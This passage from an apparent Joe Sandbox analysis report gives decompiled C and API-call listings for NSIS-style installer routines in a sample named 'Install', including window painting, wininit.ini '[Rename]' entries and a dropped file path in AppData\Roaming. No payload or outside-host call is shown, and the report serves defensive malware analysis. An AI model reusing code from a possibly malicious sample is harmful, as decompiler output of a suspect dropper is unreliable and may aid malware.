                            					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                            					_a8 = _t70;
                            					GetClientRect(_a4,  &_v32);
                            					_t126 = _v32.bottom;
                            					_v32.bottom = _v32.bottom & 0x00000000;
                            					while(_v32.top < _t126) {
                            						_a12 = _t126 - _v32.top;
                            						asm("cdq");
                            						asm("cdq");
                            						asm("cdq");
                            						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                            						_t87 = CreateBrushIndirect( &_v16);
                            						_v32.bottom = _v32.bottom + 4;
                            						_a16 = _t87;
                            						FillRect(_a8,  &_v32, _t87);
                            						DeleteObject(_a16);
                            						_v32.top = _v32.top + 4;
                            					}
                            					if( *(_t130 + 0x58) != 0xffffffff) {
                            						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                            						_a16 = _t94;
                            						if(_t94 != 0) {
                            							_t128 = _a8;
                            							_v32.left = 0x10;
                            							_v32.top = 8;
                            							SetBkMode(_t128, 1);
                            							SetTextColor(_t128,  *(_t130 + 0x58));
                            							_a8 = SelectObject(_t128, _a16);
                            							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
                            							SelectObject(_t128, _a8);
                            							DeleteObject(_a16);
                            						}
                            					}
                            					EndPaint(_a4,  &_v96);
                            					return 0;
                            				}
                            				_t102 = _a16;
                            				if(_a8 == 0x46) {
                            					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                            					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
                            				}
                            				return DefWindowProcW(_a4, _a8, _a12, _t102);
                            			}

                            APIs
                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                            • BeginPaint.USER32(?,?), ref: 00401047
                            • GetClientRect.USER32(?,?), ref: 0040105B
                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                            • FillRect.USER32 ref: 004010E4
                            • DeleteObject.GDI32(?), ref: 004010ED
                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                            • SelectObject.GDI32(00000000,?), ref: 00401140
                            • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                            • DeleteObject.GDI32(?), ref: 00401165
                            • EndPaint.USER32(?,?), ref: 0040116E
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                            • String ID: F
                            • API String ID: 941294808-1304234792
                            • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                            • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                            • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                            • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00406183(void* __ecx) {
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				long _t12;
                            				long _t24;
                            				char* _t31;
                            				int _t37;
                            				void* _t38;
                            				intOrPtr* _t39;
                            				long _t42;
                            				WCHAR* _t44;
                            				void* _t46;
                            				void* _t48;
                            				void* _t49;
                            				void* _t52;
                            				void* _t53;
                            
                            				_t38 = __ecx;
                            				_t44 =  *(_t52 + 0x14);
                            				 *0x430908 = 0x55004e;
                            				 *0x43090c = 0x4c;
                            				if(_t44 == 0) {
                            					L3:
                            					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
                            					if(_t12 != 0 && _t12 <= 0x400) {
                            						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
                            						_t53 = _t52 + 0x10;
                            						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
                            						_t12 = E0040602D(0x431108, 0xc0000000, 4);
                            						_t48 = _t12;
                            						 *(_t53 + 0x18) = _t48;
                            						if(_t48 != 0xffffffff) {
                            							_t42 = GetFileSize(_t48, 0);
                            							_t6 = _t37 + 0xa; // 0xa
                            							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                            							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
                            								L18:
                            								return CloseHandle(_t48);
                            							} else {
                            								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
                            									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
                            									if(_t49 == 0) {
                            										_t48 =  *(_t53 + 0x18);
                            										L16:
                            										_t24 = _t42;
                            										L17:
                            										E00405FE8(_t24 + _t46, 0x430508, _t37);
                            										SetFilePointer(_t48, 0, 0, 0);
                            										E004060DF(_t48, _t46, _t42 + _t37);
                            										GlobalFree(_t46);
                            										goto L18;
                            									}
                            									_t39 = _t46 + _t42;
                            									_t31 = _t39 + _t37;
                            									while(_t39 > _t49) {
                            										 *_t31 =  *_t39;
                            										_t31 = _t31 - 1;
                            										_t39 = _t39 - 1;
                            									}
                            									_t24 = _t49 - _t46 + 1;
                            									_t48 =  *(_t53 + 0x18);
                            									goto L17;
                            								}
                            								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                            								_t42 = _t42 + 0xa;
                            								goto L16;
                            							}
                            						}
                            					}
                            				} else {
                            					CloseHandle(E0040602D(_t44, 0, 1));
                            					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
                            					if(_t12 != 0 && _t12 <= 0x400) {
                            						goto L3;
                            					}
                            				}
                            				return _t12;
                            			}

                            APIs
                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                            • GetShortPathNameW.KERNEL32 ref: 004061C7
                              • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                              • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                            • GetShortPathNameW.KERNEL32 ref: 004061E4
                            • wsprintfA.USER32 ref: 00406202
                            • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                            • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                            • GlobalFree.KERNEL32 ref: 004062EB
                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                              • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                              • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                            • String ID: %ls=%ls$[Rename]
                            • API String ID: 2171350718-461813615
                            • Opcode ID: 0194637bb94274dabed0f9800811d2c41cbe4f0b5fb95fd5530e1cac65c060f3
                            • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                            • Opcode Fuzzy Hash: 0194637bb94274dabed0f9800811d2c41cbe4f0b5fb95fd5530e1cac65c060f3
                            • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                            				struct tagLOGBRUSH _v16;
                            				long _t39;
                            				long _t41;
                            				void* _t44;
                            				signed char _t50;
                            				long* _t54;
                            
                            				if(_a4 + 0xfffffecd > 5) {
                            					L18:
                            					return 0;
                            				}
                            				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                            				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                            					goto L18;
                            				} else {
                            					_t50 = _t54[5];
                            					if((_t50 & 0xffffffe0) != 0) {
                            						goto L18;
                            					}
                            					_t39 =  *_t54;
                            					if((_t50 & 0x00000002) != 0) {
                            						_t39 = GetSysColor(_t39);
                            					}
                            					if((_t54[5] & 0x00000001) != 0) {
                            						SetTextColor(_a8, _t39);
                            					}
                            					SetBkMode(_a8, _t54[4]);
                            					_t41 = _t54[1];
                            					_v16.lbColor = _t41;
                            					if((_t54[5] & 0x00000008) != 0) {
                            						_t41 = GetSysColor(_t41);
                            						_v16.lbColor = _t41;
                            					}
                            					if((_t54[5] & 0x00000004) != 0) {
                            						SetBkColor(_a8, _t41);
                            					}
                            					if((_t54[5] & 0x00000010) != 0) {
                            						_v16.lbStyle = _t54[2];
                            						_t44 = _t54[3];
                            						if(_t44 != 0) {
                            							DeleteObject(_t44);
                            						}
                            						_t54[3] = CreateBrushIndirect( &_v16);
                            					}
                            					return _t54[3];
                            				}
                            			}

                            APIs
                            • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                            • GetSysColor.USER32(00000000), ref: 0040455B
                            • SetTextColor.GDI32(?,00000000), ref: 00404567
                            • SetBkMode.GDI32(?,?), ref: 00404573
                            • GetSysColor.USER32(?), ref: 00404586
                            • SetBkColor.GDI32(?,?), ref: 00404596
                            • DeleteObject.GDI32(?), ref: 004045B0
                            • CreateBrushIndirect.GDI32(?), ref: 004045BA
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                            • String ID:
                            • API String ID: 2320649405-0
                            • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                            • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                            • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                            • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                            				intOrPtr _t65;
                            				intOrPtr _t66;
                            				intOrPtr _t72;
                            				void* _t76;
                            				void* _t79;
                            
                            				_t72 = __edx;
                            				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                            				_t65 = 2;
                            				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                            				_t66 = E00402D84(_t65);
                            				_t79 = _t66 - 1;
                            				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                            				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                            				if(_t79 < 0) {
                            					L36:
                            					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
                            				} else {
                            					__ecx = 0x3ff;
                            					if(__eax > 0x3ff) {
                            						 *(__ebp - 0x44) = 0x3ff;
                            					}
                            					if( *__edi == __bx) {
                            						L34:
                            						__ecx =  *(__ebp - 0xc);
                            						__eax =  *(__ebp - 8);
                            						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                            						if(_t79 == 0) {
                            							 *(_t76 - 4) = 1;
                            						}
                            						goto L36;
                            					} else {
                            						 *(__ebp - 0x38) = __ebx;
                            						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
                            						if( *(__ebp - 0x44) > __ebx) {
                            							do {
                            								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                            									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
                            										__eax = __ebp - 0x50;
                            										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                            											goto L34;
                            										} else {
                            											goto L21;
                            										}
                            									} else {
                            										goto L34;
                            									}
                            								} else {
                            									__eax = __ebp - 0x40;
                            									_push(__ebx);
                            									_push(__ebp - 0x40);
                            									__eax = 2;
                            									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                            									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                            									if(__eax == 0) {
                            										goto L34;
                            									} else {
                            										__ecx =  *(__ebp - 0x40);
                            										if(__ecx == __ebx) {
                            											goto L34;
                            										} else {
                            											__ax =  *(__ebp + 0xa) & 0x000000ff;
                            											 *(__ebp - 0x4c) = __ecx;
                            											 *(__ebp - 0x50) = __eax;
                            											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                            												L28:
                            												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
                            											} else {
                            												__ebp - 0x50 = __ebp + 0xa;
                            												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                            													L21:
                            													__eax =  *(__ebp - 0x50);
                            												} else {
                            													__edi =  *(__ebp - 0x4c);
                            													__edi =  ~( *(__ebp - 0x4c));
                            													while(1) {
                            														_t22 = __ebp - 0x40;
                            														 *_t22 =  *(__ebp - 0x40) - 1;
                            														__eax = 0xfffd;
                            														 *(__ebp - 0x50) = 0xfffd;
                            														if( *_t22 == 0) {
                            															goto L22;
                            														}
                            														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                            														__edi = __edi + 1;
                            														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                            														__eax = __ebp + 0xa;
                            														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                            															continue;
                            														} else {
                            															goto L21;
                            														}
                            														goto L22;
                            													}
                            												}
                            												L22:
                            												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                            													goto L28;
                            												} else {
                            													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                            														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                            															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                            															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                            														} else {
                            															__ecx =  *(__ebp - 0xc);
                            															__edx =  *(__ebp - 8);
                            															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                            															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                            														}
                            														goto L34;
                            													} else {
                            														__ecx =  *(__ebp - 0xc);
                            														__edx =  *(__ebp - 8);
                            														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                            														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                            														 *(__ebp - 0x38) = __eax;
                            														if(__ax == __bx) {
                            															goto L34;
                            														} else {
                            															goto L26;
                            														}
                            													}
                            												}
                            											}
                            										}
                            									}
                            								}
                            								goto L37;
                            								L26:
                            								__eax =  *(__ebp - 8);
                            							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                            						}
                            						goto L34;
                            					}
                            				}
                            				L37:
                            				return 0;
                            			}








                            Per-line instruction addresses for the listing above (column alignment lost in extraction): 0x004026ec to 0x00402c39.

                            APIs
                            • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                              • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: File$Pointer$ByteCharMultiWide$Read
                            • String ID: 9
                            • API String ID: 163830602-2366072709
                            • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                            • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                            • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                            • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0040559F(signed int _a4, WCHAR* _a8) {
                            				struct HWND__* _v8;
                            				signed int _v12;
                            				WCHAR* _v32;
                            				long _v44;
                            				int _v48;
                            				void* _v52;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				WCHAR* _t27;
                            				signed int _t28;
                            				long _t29;
                            				signed int _t37;
                            				signed int _t38;
                            
                            				_t27 =  *0x433ee4;
                            				_v8 = _t27;
                            				if(_t27 != 0) {
                            					_t37 =  *0x434fb4;
                            					_v12 = _t37;
                            					_t38 = _t37 & 0x00000001;
                            					if(_t38 == 0) {
                            						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
                            					}
                            					_t27 = lstrlenW(0x42c248);
                            					_a4 = _t27;
                            					if(_a8 == 0) {
                            						L6:
                            						if((_v12 & 0x00000004) == 0) {
                            							_t27 = SetWindowTextW( *0x433ec8, 0x42c248);
                            						}
                            						if((_v12 & 0x00000002) == 0) {
                            							_v32 = 0x42c248;
                            							_v52 = 1;
                            							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                            							_v44 = 0;
                            							_v48 = _t29 - _t38;
                            							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                            							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                            						}
                            						if(_t38 != 0) {
                            							_t28 = _a4;
                            							0x42c248[_t28] = 0;
                            							return _t28;
                            						}
                            					} else {
                            						_t27 = lstrlenW(_a8) + _a4;
                            						if(_t27 < 0x1000) {
                            							_t27 = lstrcatW(0x42c248, _a8);
                            							goto L6;
                            						}
                            					}
                            				}
                            				return _t27;
                            			}

















                            Per-line instruction addresses for the listing above (column alignment lost in extraction): 0x004055a5 to 0x0040566f.

                            APIs
                            • lstrlenW.KERNEL32(0042C248,00000000,?,76CDEA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                            • lstrlenW.KERNEL32(00403418,0042C248,00000000,?,76CDEA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                            • lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                            • SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                              • Part of subcall function 0040657A: lstrcatW.KERNEL32(C:\Users\user\AppData\Roaming\34432.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                              • Part of subcall function 0040657A: lstrlenW.KERNEL32(C:\Users\user\AppData\Roaming\34432.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: MessageSendlstrlen$lstrcat$TextWindow
                            • String ID:
                            • API String ID: 1495540970-0
                            • Opcode ID: 61fc35634f83d303f4bb0fdf458391b4626c4708e393b35bd1b1a29fdfa46634
                            • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                            • Opcode Fuzzy Hash: 61fc35634f83d303f4bb0fdf458391b4626c4708e393b35bd1b1a29fdfa46634
                            • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 91%
                            			E004067C4(WCHAR* _a4) {
                            				short _t5;
                            				short _t7;
                            				WCHAR* _t19;
                            				WCHAR* _t20;
                            				WCHAR* _t21;
                            
                            				_t20 = _a4;
                            				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                            					_t20 =  &(_t20[4]);
                            				}
                            				if( *_t20 != 0 && E00405E83(_t20) != 0) {
                            					_t20 =  &(_t20[2]);
                            				}
                            				_t5 =  *_t20;
                            				_t21 = _t20;
                            				_t19 = _t20;
                            				if(_t5 != 0) {
                            					do {
                            						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
                            							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                            							_t19 = CharNextW(_t19);
                            						}
                            						_t20 = CharNextW(_t20);
                            						_t5 =  *_t20;
                            					} while (_t5 != 0);
                            				}
                            				 *_t19 =  *_t19 & 0x00000000;
                            				while(1) {
                            					_push(_t19);
                            					_push(_t21);
                            					_t19 = CharPrevW();
                            					_t7 =  *_t19;
                            					if(_t7 != 0x20 && _t7 != 0x5c) {
                            						break;
                            					}
                            					 *_t19 =  *_t19 & 0x00000000;
                            					if(_t21 < _t19) {
                            						continue;
                            					}
                            					break;
                            				}
                            				return _t7;
                            			}








                            Per-line instruction addresses for the listing above (column alignment lost in extraction): 0x004067c6 to 0x00406870.

                            APIs
                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                            • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                            • CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                            • CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Char$Next$Prev
                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                            • API String ID: 589700163-4010320282
                            • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                            • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                            • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                            • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
                            				long _v8;
                            				signed char _v12;
                            				unsigned int _v16;
                            				void* _v20;
                            				intOrPtr _v24;
                            				long _v56;
                            				void* _v60;
                            				long _t15;
                            				unsigned int _t19;
                            				signed int _t25;
                            				struct HWND__* _t28;
                            
                            				_t28 = _a4;
                            				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                            				if(_a8 == 0) {
                            					L4:
                            					_v56 = _t15;
                            					_v60 = 4;
                            					SendMessageW(_t28, 0x113e, 0,  &_v60);
                            					return _v24;
                            				}
                            				_t19 = GetMessagePos();
                            				_v16 = _t19 >> 0x10;
                            				_v20 = _t19;
                            				ScreenToClient(_t28,  &_v20);
